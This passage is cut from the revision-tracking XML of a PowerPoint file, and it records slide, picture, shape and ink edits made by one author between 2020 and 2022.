            <ac:picMk id="15" creationId="{FBEFC3C2-71FC-40C6-E9EF-E3BE202FAA1B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:47:55.363" v="71" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4203979413" sldId="476"/>
            <ac:picMk id="17" creationId="{F4DDAB30-28EF-3DBD-32C2-0450AAF9DF06}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod delAnim modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T20:46:44.736" v="494"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="704723" sldId="477"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:48:58.253" v="87" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="704723" sldId="477"/>
            <ac:spMk id="2" creationId="{69EFC430-5BD6-CCB1-9AB3-7AFC7F6E05B9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:49:06.238" v="89" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="704723" sldId="477"/>
            <ac:spMk id="3" creationId="{C9A23199-6F96-2D45-97C5-7C4D3031346D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T20:45:13.454" v="480" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="704723" sldId="477"/>
            <ac:picMk id="4" creationId="{6FED3DC5-6161-A4B4-54D6-3543F3D18248}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T20:30:52.213" v="473" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="704723" sldId="477"/>
            <ac:picMk id="6" creationId="{00E7224B-07B7-648A-6DF1-E62B6B170E22}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T20:45:40.510" v="482" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="704723" sldId="477"/>
            <ac:picMk id="7" creationId="{BDF515C0-E733-69ED-5387-1476DE9642C8}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T20:30:52.213" v="473" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="704723" sldId="477"/>
            <ac:picMk id="8" creationId="{D217A137-0432-640F-F9B4-48FB1AC2ED06}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T20:46:24.038" v="488" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="704723" sldId="477"/>
            <ac:picMk id="10" creationId="{C6D41F4E-F696-8856-08B4-40C1E9BC647B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T20:45:10.035" v="478" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="704723" sldId="477"/>
            <ac:picMk id="12" creationId="{D46DCF33-2B93-6E6E-1B0D-013553A8EAF7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T20:45:11.339" v="479" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="704723" sldId="477"/>
            <ac:picMk id="15" creationId="{1F089367-65E5-C779-1DD6-24333204E400}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod delAnim modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T21:27:27.641" v="517"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4205436506" sldId="478"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:49:37.289" v="123" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4205436506" sldId="478"/>
            <ac:spMk id="2" creationId="{1B1D9EA4-E5E5-E86E-F4CB-FAD00B46279C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:49:50.828" v="139" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4205436506" sldId="478"/>
            <ac:spMk id="23" creationId="{E5DD4719-C72E-16FA-53C5-FB08E5EC867A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T21:24:33.516" v="498" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4205436506" sldId="478"/>
            <ac:picMk id="4" creationId="{D1553AE3-0BF3-A779-E3F2-8F9FFB41EAE5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T21:27:19.720" v="513" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4205436506" sldId="478"/>
            <ac:picMk id="6" creationId="{7B2253A1-B7C6-DCEC-28B7-E184609937A7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T21:27:04.297" v="509" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4205436506" sldId="478"/>
            <ac:picMk id="28" creationId="{6BA080EE-3203-6B35-4CE3-0DBB7D7301E2}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T21:24:26.508" v="495" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4205436506" sldId="478"/>
            <ac:picMk id="31" creationId="{E723411A-C26B-AE44-FA32-B5C10F896520}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T21:27:04.297" v="509" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4205436506" sldId="478"/>
            <ac:picMk id="33" creationId="{A53A34F8-EAC1-0326-05C5-F7B06D1A7F30}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod delAnim modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T21:32:27.399" v="529"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4241414833" sldId="479"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T16:00:00.261" v="360" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4241414833" sldId="479"/>
            <ac:spMk id="2" creationId="{AC481540-2868-077C-09A7-21A342C7E539}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T21:30:44.993" v="518" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4241414833" sldId="479"/>
            <ac:picMk id="5" creationId="{B9AB8872-C066-B096-C7C4-D912E58043E2}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T21:31:32.288" v="524" actId="732"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4241414833" sldId="479"/>
            <ac:picMk id="6" creationId="{018460C9-9561-5CB7-709E-4CB04723025F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T21:30:45.752" v="519" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4241414833" sldId="479"/>
            <ac:picMk id="7" creationId="{2399000E-2107-EB76-C6D0-303E2CC1A0E7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T21:32:11.640" v="527" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4241414833" sldId="479"/>
            <ac:picMk id="9" creationId="{4362A3D9-EF03-3A32-9CCF-D5EBC5B4D61E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T16:00:06.105" v="361" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3793178618" sldId="578"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T16:00:06.105" v="361" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3793178618" sldId="578"/>
            <ac:spMk id="2" creationId="{A020F147-7431-690B-B896-2464123D0CB8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T16:00:11.669" v="362" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1546088563" sldId="579"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T16:00:11.669" v="362" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1546088563" sldId="579"/>
            <ac:spMk id="2" creationId="{8286F270-9E26-0076-31B5-3C6DDE8F0935}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}"/>
    <pc:docChg chg="undo redo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-12-10T19:14:24.814" v="11387" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-23T15:31:30.554" v="11268" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4073586220" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:20:04.733" v="7910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modSp add del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:00:41.752" v="6125" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2229056209" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-23T19:49:00.798" v="465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0-23T20:16:42.539" v="808" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2229056209" sldId="267"/>
            <ac:spMk id="4" creationId="{478AB046-1B68-488D-AE60-8F01F95A10E4}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:47:50.542" v="5887" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3230129895" sldId="305"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:47:50.542" v="5887" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3230129895" sldId="305"/>
            <ac:spMk id="3" creationId="{F6C92554-F1BB-48DE-AF75-447F51F90828}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:01:27.547" v="6147" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="318208907" sldId="316"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:01:27.547" v="6147" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="318208907" sldId="316"/>
            <ac:spMk id="4" creationId="{109942E4-E5EC-409B-81F6-0AA8029AE2FB}"/>
          </ac:spMkLst>
        </pc:sp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5301462" sldId="32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20802679" sldId="33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319048051" sldId="33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766084224" sldId="332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683626124" sldId="333"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod delAnim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2014413914" sldId="334"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-23T19:16:06.395" v="409" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="334"/>
            <ac:spMk id="59" creationId="{00E6EB91-CEEC-42B0-99E0-8256A7512B81}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-23T19:15:00.306" v="405" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="334"/>
            <ac:spMk id="60" creationId="{8379C367-A3DA-4013-B931-8FFC362EF25E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:51:05.043" v="5905" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="33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2" creationId="{69B82132-08BE-4E9B-9C4E-BA5DC11AFC8B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3" creationId="{B7032657-719E-4411-8349-89AA04CA906F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4" creationId="{6EE59968-5BC7-475F-A149-0C109B02C192}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-23T19:15:06.548" v="406" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="334"/>
            <ac:grpSpMk id="26" creationId="{0792FBD7-0BB7-48DE-B7BD-41A70B009012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8" creationId="{FB835F08-091D-479B-907B-9854036CC940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9" creationId="{9B879847-713C-4212-A128-DAB7E0707103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32" creationId="{77D985C1-EAFD-4B62-B1E0-9FA57A7E6232}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add 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51" creationId="{81A954F8-A172-4BA7-B5DA-4DF23A898417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55" creationId="{1AB8CEC2-83AD-4AE4-B495-DE287268FA46}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:55:56.173" v="6102"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="334"/>
            <ac:grpSpMk id="68" creationId="{6EE27F01-DFC3-49DB-BA42-DD4DC22D6296}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:51:01.403" v="5903" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="334"/>
            <ac:picMk id="2" creationId="{93DF79E5-61EA-491A-8B74-8DDBA33A6421}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-23T19:17:16.100" v="412" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="334"/>
            <ac:picMk id="20" creationId="{B5414312-107F-4C04-A0A1-EF920D8FE924}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:51:05.043" v="5905" actId="478"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="334"/>
            <ac:inkMk id="3" creationId="{47B28F51-5841-4255-AAF4-0A6DE6746846}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:51:02.437" v="5904" actId="478"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="334"/>
            <ac:inkMk id="4" creationId="{ED4F84B1-699E-45D3-93BC-AB8D8B7403B7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:51:05.043" v="5905" actId="478"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="334"/>
            <ac:inkMk id="5" creationId="{2FA01590-63B2-4909-8100-AA87A3A4A7BA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1" creationId="{BB9BC961-581A-4B0C-AE86-CCBF5BA2C341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2" creationId="{CD4324D5-8ABA-401D-A1C9-E71F48226FAE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3" creationId="{E2B7F597-E533-4103-BD86-8CBA5CFA59C8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4" creationId="{670C3951-C446-463E-8E30-BDD49A9C9C4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5" creationId="{0463C0EC-8320-48DD-9B99-44CBD5F53006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5" creationId="{BD62B7B2-EC29-4C82-BF56-82174F99EF40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6" creationId="{99AF6E1F-1B24-4EB3-8C6E-795E14C701E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7" creationId="{C25825CB-212D-4123-B6A4-2DDBD288A904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0" creationId="{741AE8EE-B3E1-4108-AF79-1EF5BC4B844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1" creationId="{87ABBCF6-1EB4-4CE8-9EF1-7D0B4CB95EC4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3" creationId="{201504FF-E75E-477A-8F5F-3A1BB05A4156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4" creationId="{D1F21173-1922-4878-9D71-D9851743236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5" creationId="{B50C78A8-F6DF-47F8-BBDB-F01116F27CF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6" creationId="{190C4CC4-3317-4ACE-8A7A-6CB015167F49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7" creationId="{3DEF27E8-0F60-4ABD-B7A8-7FC75CCC9AD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8" creationId="{FA3EB37A-1F5C-4A4B-9891-2C67B7ABDCE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9" creationId="{A2A71227-C6DD-4EBF-B504-96F5BA66F6FD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0" creationId="{E9A7DE9D-33E8-4C4A-A36B-041D4D638AF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1" creationId="{958AADC3-FC03-4974-B11C-A3743A5C214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2" creationId="{DE5EC457-86EB-4C0A-A1E0-A9E96E9A5FED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3" creationId="{7196FE07-B212-4DE2-A9CF-FA5A93C555A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4" creationId="{15ED04B1-5E56-4318-B055-4E34CC5649B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5" creationId="{0BE29B4B-074B-43A0-BC46-6730408EC123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6" creationId="{6D6A1EA0-8891-4987-A7D7-D5FDCC330DD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7" creationId="{45448955-E264-429B-9F2C-3E358734697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8" creationId="{38FF78AB-8CDB-4238-A915-44C4A622A9FB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9" creationId="{C9AA9E1B-2F80-4541-ACFE-B2AC1BF3908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0" creationId="{6EAA80DC-747F-4595-9D68-BDD45FCCE80B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2" creationId="{A53A078E-2CF4-4F9D-927B-58074C28F73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3" creationId="{0F8968EA-5BA2-4C39-B06B-41EB84BBB60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4" creationId="{AAC073E5-F19B-4F3E-B6C3-FB984FF60F8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6" creationId="{76CF6A07-BEEB-4A2A-ACD0-5AE1DC78F597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7" creationId="{E3DD5E38-A512-4466-BD76-91A4CE5D360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8" creationId="{A61B0323-E438-4FE7-B897-7F168DD499A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0" creationId="{97078374-161D-4B38-B6F7-FF5E7B2BBC0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1" creationId="{A95A1219-FC1D-4C81-AD4F-CA50FE7FB9D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2" creationId="{C46F5B54-5717-433A-85AD-B5BB44BC15F9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3" creationId="{394B6F60-90BE-4099-9A59-404EF955F541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4" creationId="{3A502A75-9F7C-47AA-8B11-FE785B529E27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5" creationId="{89ED30A2-B10E-4AE3-A5BE-D9E6D93A030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6" creationId="{31EA90E1-9733-47DC-866C-3B3E8540218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7" creationId="{D22A17D2-E3F2-49A2-BE73-A173988CF714}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:55:56.173" v="6102"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="334"/>
            <ac:inkMk id="69" creationId="{8F6099D9-121B-4D94-A584-8F3C7B3757FC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:55:56.173" v="6102"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="334"/>
            <ac:inkMk id="70" creationId="{BD1AD322-EAD7-46BB-B425-8C372719EC29}"/>
          </ac:inkMkLst>
        </pc:ink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75477346" sldId="33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220574072" sldId="337"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-07T16:52:37.569" v="5387"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="340010660" sldId="33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10736083" sldId="33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642519756" sldId="34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4261536900" sldId="34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59230682" sldId="343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299239283" sldId="344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97820429" sldId="345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762250449" sldId="34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16077539" sldId="347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68786624" sldId="34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848439976" sldId="34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448211368" sldId="350"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new add del mod modClrScheme chgLayout modNotesTx">
